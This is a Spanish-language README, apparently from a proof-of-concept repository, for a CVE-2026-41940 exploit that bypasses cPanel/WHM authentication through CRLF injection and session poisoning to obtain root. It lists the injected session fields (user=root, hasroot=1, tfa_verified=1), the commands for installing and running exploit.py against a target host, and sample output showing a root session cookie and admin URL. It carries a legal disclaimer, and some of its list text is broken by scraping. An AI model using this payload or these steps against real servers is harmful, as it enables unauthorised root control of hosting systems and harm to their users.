
Prueba de concepto del exploit para CVE-2026-41940, que demuestra la omisión de autenticación en cPanel/WHM mediante inyección CRLF y envenenamiento de sesión para obtener acceso a nivel de root.
Este repositorio contiene un exploit de prueba de concepto (PoC) para CVE-2026-41940, que demuestra un bypass de autenticación en múltiples pasos en cPanel/WHM mediante inyección CRLF y envenenamiento de sesión.
Aviso legal: Este código es solo para fines educativos y pruebas de seguridad autorizadas. NO lo utilices contra sistemas que no poseas o para los que no tengas permiso explícito de prueba.
Este PoC replica una cadena de explotación del mundo real basada en técnicas observadas por Hadrian y watchTowr.
La vulnerabilidad permite a un atacante:
El exploit sigue un proceso de 4 pasos:
whostmgrsession / cpsession)Authorization manipulado (codificado en base64)El payload inyectado incluye:
user=root
hasroot=1
tfa_verified=1
cp_security_token=/cpsessXXXXXXXXXX
/json-api/version?api.version=1Si tiene éxito:
requestsInstalar dependencia:
pip install requests
python3 exploit.py --host <objetivo>
--ssl Usar HTTPS--port Especificar puerto personalizado--verbose Habilitar salida de depuraciónpython3 exploit.py --host example.com --ssl --port 2087 --verbose
Explotación exitosa:
[+] ¡ÉXITO! Autenticado como root mediante CVE-2026-41940.
[+] Cookie: whostmgrsession=...
[+] URL de administración: https://target:2087/cpsess.../json-api/version?api.version=1
Si eres administrador de sistemas:
La vulnerabilidad reside en:
El exploit abusa de:
AuthorizationEste PoC se proporciona tal cual para:
El uso no autorizado puede violar leyes y regulaciones.